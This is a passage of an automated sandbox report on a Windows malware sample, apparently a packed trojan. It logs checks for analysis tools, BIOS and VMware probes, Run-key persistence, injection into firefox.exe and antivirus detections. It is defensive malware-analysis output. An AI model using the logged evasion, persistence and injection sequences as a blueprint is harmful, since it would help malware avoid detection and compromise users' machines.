FindWindowA July 27, 2024, 12:34 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA July 27, 2024, 12:34 p.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\d2fed1fe92.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\a0c68cc885.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe
file	C:\Windows\Tasks\explorti.job

Potential code injection by writing to the memory of another process (50 out of 63 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffa22b0 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffb0d88 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I»`#÷?Aÿã base_address: 0x0000000076d81590 process_identifier: 2216 process_handle: 0x0000000000000050	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ¥ base_address: 0x000000013ffb0d78 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I» ÷?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2216 process_handle: 0x0000000000000050	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ¥ base_address: 0x000000013ffb0d70 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ÏT base_address: 0x000000013ff50108 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013ffaaae8 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffb0c78 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f4722b0 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480d88 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I»`#D?Aÿã base_address: 0x0000000076d81590 process_identifier: 1528 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: õ) base_address: 0x000000013f480d78 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I» D?Aÿã base_address: 0x0000000076d57a90 process_identifier: 1528 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: õ) base_address: 0x000000013f480d70 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ÏT base_address: 0x000000013f420108 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f47aae8 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480c78 process_identifier: 1528 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f4722b0 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480d88 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I»`#D?Aÿã base_address: 0x0000000076d81590 process_identifier: 2276 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480d78 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I» D?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2276 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480d70 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ÏT base_address: 0x000000013f420108 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f47aae8 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013f480c78 process_identifier: 2276 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb722b0 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb80d88 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I»`#´?Aÿã base_address: 0x0000000076d81590 process_identifier: 1252 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: wG base_address: 0x000000013fb80d78 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I» ´?Aÿã base_address: 0x0000000076d57a90 process_identifier: 1252 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: wG base_address: 0x000000013fb80d70 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: ÏT base_address: 0x000000013fb20108 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013fb7aae8 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb80c78 process_identifier: 1252 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb722b0 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb80d88 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I»`#´?Aÿã base_address: 0x0000000076d81590 process_identifier: 736 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: *I base_address: 0x000000013fb80d78 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I» ´?Aÿã base_address: 0x0000000076d57a90 process_identifier: 736 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: *I base_address: 0x000000013fb80d70 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: ÏT base_address: 0x000000013fb20108 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013fb7aae8 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb80c78 process_identifier: 736 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb722b0 process_identifier: 1320 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: base_address: 0x000000013fb80d88 process_identifier: 1320 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I»`#´?Aÿã base_address: 0x0000000076d81590 process_identifier: 1320 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: 2 base_address: 0x000000013fb80d78 process_identifier: 1320 process_handle: 0x0000000000000048	1	1
WriteProcessMemory July 27, 2024, 12:35 p.m.	buffer: I» ´?Aÿã base_address: 0x0000000076d57a90 process_identifier: 1320 process_handle: 0x000000000000004c	1	1

Network activity contains more than one unique useragent (2 events)

process	explorti.exe				useragent
process	crashreporter.exe				useragent	Breakpad/1.0 (Windows)

One or more non-whitelisted processes were created (13 events)

parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\9b020da8-cbfa-4a67-ba46-a8df653b5180.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\f28e746d-3501-4d2e-9076-d209e05a2fed.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\42beb461-1458-4434-946f-8340d1743b2d.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\417673e5-5940-447d-bdd2-3ca89634924d.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\dbde6e5a-3000-49e1-b004-9a1dd2dbae29.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\4efec9f7-3e9a-43b8-b4b8-432106fa8532.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

Appends a known multi-family ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (16 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 812 resumed a thread in remote process 1356
Process injection	Process 1356 resumed a thread in remote process 2216
Process injection	Process 232 resumed a thread in remote process 1528
Process injection	Process 1976 resumed a thread in remote process 2276
Process injection	Process 1512 resumed a thread in remote process 1252
Process injection	Process 1040 resumed a thread in remote process 736
Process injection	Process 3068 resumed a thread in remote process 1320
Process injection	Process 872 resumed a thread in remote process 1784
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x000002d8 suspend_count: 1 process_identifier: 1356	1	0	0
NtResumeThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2216	1	0	0
NtResumeThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1528	1	0	0
NtResumeThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2276	1	0	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1252	1	0	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 736	1	0	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1320	1	0	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1784	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 e6 51 89 04 24 b8 exception.symbol: random+0x203645 exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2111045 exception.address: 0x1403645 registers.esp: 1964072 registers.edi: 0 registers.eax: 1447909480 registers.ebp: 4009340948 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 20972343 registers.ecx: 20	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 230 events)

Time & API	Arguments	Status	Return
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x000001ec suspend_count: 1 process_identifier: 2548	1	0
CreateProcessInternalW July 27, 2024, 12:34 p.m.	thread_identifier: 2828 thread_handle: 0x000003d0 process_identifier: 2824 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003d8	1	1
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x000001a0 suspend_count: 1 process_identifier: 2824	1	0
CreateProcessInternalW July 27, 2024, 12:34 p.m.	thread_identifier: 3024 thread_handle: 0x00000474 process_identifier: 3020 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000478	1	1
CreateProcessInternalW July 27, 2024, 12:34 p.m.	thread_identifier: 2056 thread_handle: 0x00000464 process_identifier: 812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000488	1	1
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x000002b4 suspend_count: 1 process_identifier: 812	1	0
CreateProcessInternalW July 27, 2024, 12:34 p.m.	thread_identifier: 1336 thread_handle: 0x000002d8 process_identifier: 1356 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002e0	1	1
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x000002d8 suspend_count: 1 process_identifier: 1356	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:34 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:35 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:36 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
NtResumeThread July 27, 2024, 12:36 p.m.	thread_handle: 0x00000158 suspend_count: 0 process_identifier: 812	1	0
CreateProcessInternalW July 27, 2024, 12:27 p.m.	thread_identifier: 2220 thread_handle: 0x0000000000000044 process_identifier: 2216 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 1028 (CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT) inherit_handles: 0 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffa22b0 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffb0d88 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
NtMapViewOfSection July 27, 2024, 12:27 p.m.	section_handle: 0x0000000000000060 process_identifier: 2216 commit_size: 0 win32_protect: 32 (PAGE_EXECUTE_READ) buffer: base_address: 0x0000000005a50000 allocation_type: 0 () section_offset: 0 view_size: 65536 process_handle: 0x0000000000000050	1	0
NtAllocateVirtualMemory July 27, 2024, 12:27 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000005a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x0000000000000050	1	0
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I»`#÷?Aÿã base_address: 0x0000000076d81590 process_identifier: 2216 process_handle: 0x0000000000000050	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ¥ base_address: 0x000000013ffb0d78 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: I» ÷?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2216 process_handle: 0x0000000000000050	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ¥ base_address: 0x000000013ffb0d70 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: ÏT base_address: 0x000000013ff50108 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013ffaaae8 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
WriteProcessMemory July 27, 2024, 12:27 p.m.	buffer: base_address: 0x000000013ffb0c78 process_identifier: 2216 process_handle: 0x000000000000004c	1	1
NtResumeThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2216	1	0
NtResumeThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000174 suspend_count: 1 process_identifier: 2216	1	0
NtGetContextThread July 27, 2024, 12:27 p.m.	thread_handle: 0x0000000000000234	1	0
NtGetContextThread July 27, 2024, 12:27 p.m.	thread_handle: 0x000000000000023c	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.tc
ALYac	Gen:Variant.Kryptik.260
Cylance	Unsafe
VIPRE	Gen:Variant.Kryptik.260
BitDefender	Gen:Variant.Kryptik.260
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
Avast	Win32:TrojanX-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Generic
MicroWorld-eScan	Gen:Variant.Kryptik.260
Emsisoft	Gen:Variant.Kryptik.260 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
McAfeeD	Real Protect-LS!E04AFEEB6BB4
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.e04afeeb6bb46b37
Sophos	Generic ML PUA (PUA)
SentinelOne	Static AI - Malicious PE
Google	Detected
Avira	TR/Crypt.TPM.Gen
MAX	malware (ai score=85)
Gridinsoft	Trojan.Heur!.038120A1
ZoneAlarm	HEUR:Trojan.Win32.Generic
GData	Gen:Variant.Kryptik.260
Varist	W32/Agent.JDU.gen!Eldorado
AhnLab-V3	Trojan/Win.Generic.R645974
